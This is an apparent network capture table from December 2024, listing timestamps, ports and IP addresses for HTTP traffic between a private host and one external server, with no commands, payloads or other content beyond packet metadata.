Dec 13, 2024 07:47:45.862390041 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862410069 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862437963 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862457991 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862524033 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862554073 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862581968 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862607956 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862638950 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862731934 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862767935 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862788916 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862823963 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862838030 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862904072 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862937927 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862957954 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.905642986 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.905791044 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.905802011 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.905827999 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.906008959 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.906059027 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.906068087 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.906116009 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.906126022 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.906502962 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.906538010 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.906555891 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.906636000 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.906673908 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.906682968 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.906692028 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.906799078 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.907134056 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.907154083 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.907232046 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.907241106 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.907248974 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.907259941 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.907291889 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.907300949 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.907861948 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.907912016 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.907923937 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.908009052 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.908045053 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.908054113 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.908061981 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.908082008 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.908091068 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.908716917 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.908781052 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.908791065 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.908837080 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.908878088 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.908951998 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.908962965 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.908992052 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909002066 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909010887 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909019947 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909053087 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909063101 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909085989 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909102917 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909154892 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909679890 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909689903 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909714937 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909790039 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909799099 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909806967 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909846067 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909853935 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909857988 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909862041 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909889936 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909898043 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909950018 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909960032 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909969091 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909981012 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.909991026 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910023928 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910032988 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910042048 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910049915 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910119057 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910388947 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910397053 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910404921 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910423040 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910432100 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910478115 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910486937 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910496950 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910531044 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910577059 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910609961 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910670042 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910679102 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910686970 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910702944 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910716057 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910726070 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.910734892 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.911039114 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.911092043 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.911102057 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.911108971 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.911171913 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.911180973 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.911189079 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.911200047 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.911250114 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.911267996 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.911277056 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.911292076 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.911303043 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.911310911 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.911521912 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.911530972 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.911541939 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.911550999 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.911653042 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.911662102 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.025610924 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.025624990 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.025635004 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.025672913 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.025686026 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.025696039 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.025772095 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.025782108 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.025789976 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.025799036 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.025808096 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.025818110 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.025827885 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.025942087 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.025964975 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.025974035 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.025986910 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.025995970 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.026000023 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.026407003 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.026415110 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.026423931 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.026432991 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.026443958 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.026518106 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.026526928 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.026534081 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.026541948 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.026688099 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.026695967 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.026704073 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.026812077 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.026820898 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.026832104 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.026851892 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.026953936 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.027136087 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.027265072 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.027275085 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.027282953 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.027292013 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.027297020 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.027390957 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.027400970 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.027409077 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.027417898 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.027429104 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.027437925 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.027540922 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.027550936 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.027717113 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.027725935 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.028009892 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.028018951 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.028027058 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.028036118 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.028044939 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.028137922 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.028146982 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.028155088 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.028157949 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.028167963 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.028280973 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.028290033 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.028296947 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.028307915 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.028429985 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.028439045 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.028446913 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.028595924 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.028938055 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.028949022 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029043913 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029053926 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029062033 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029072046 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029083014 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029093981 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029161930 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029170990 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029177904 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029186010 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029196978 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029206038 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029329062 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029336929 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029476881 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029799938 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029808998 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029817104 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029834986 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029936075 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029944897 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.029953003 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030078888 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030087948 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030097008 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030106068 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030114889 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030227900 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030236006 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030244112 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030531883 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030541897 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030549049 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030558109 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030675888 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030684948 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030693054 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030702114 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030709982 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030719042 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030744076 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030752897 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030762911 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030848980 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030859947 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030868053 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030889988 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030899048 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030908108 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.030916929 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031012058 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031019926 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031028986 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031151056 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031160116 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031171083 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031179905 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031284094 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031291962 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031301022 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031311035 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031325102 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031429052 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031436920 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031445980 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031455040 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031734943 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031744003 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031752110 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031760931 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031769991 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031779051 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031900883 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031910896 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031919956 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031929016 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031936884 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031945944 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.031949997 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.032430887 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.032439947 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.032449961 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.032460928 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.032470942 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.032479048 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.032488108 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.032496929 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.032740116 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.032748938 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.032757044 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.032764912 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.032895088 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.032905102 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033036947 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033046007 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033052921 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033061028 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033075094 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033157110 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033166885 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033174992 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033183098 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033191919 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033204079 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033266068 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033274889 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033282995 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033291101 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033299923 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033308983 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033317089 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033778906 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033787966 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033796072 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033803940 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033813953 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033824921 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033833981 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033842087 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033850908 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033866882 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033889055 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033896923 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033905983 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033914089 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033921957 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033931017 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.033940077 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.034090042 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.034260035 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.034269094 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.034379959 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.034389973 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.034396887 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.034405947 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.034415960 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.034425974 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.034507036 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.034516096 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.034523010 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.034533024 CET	80	49775	185.81.68.147	192.168.2.4
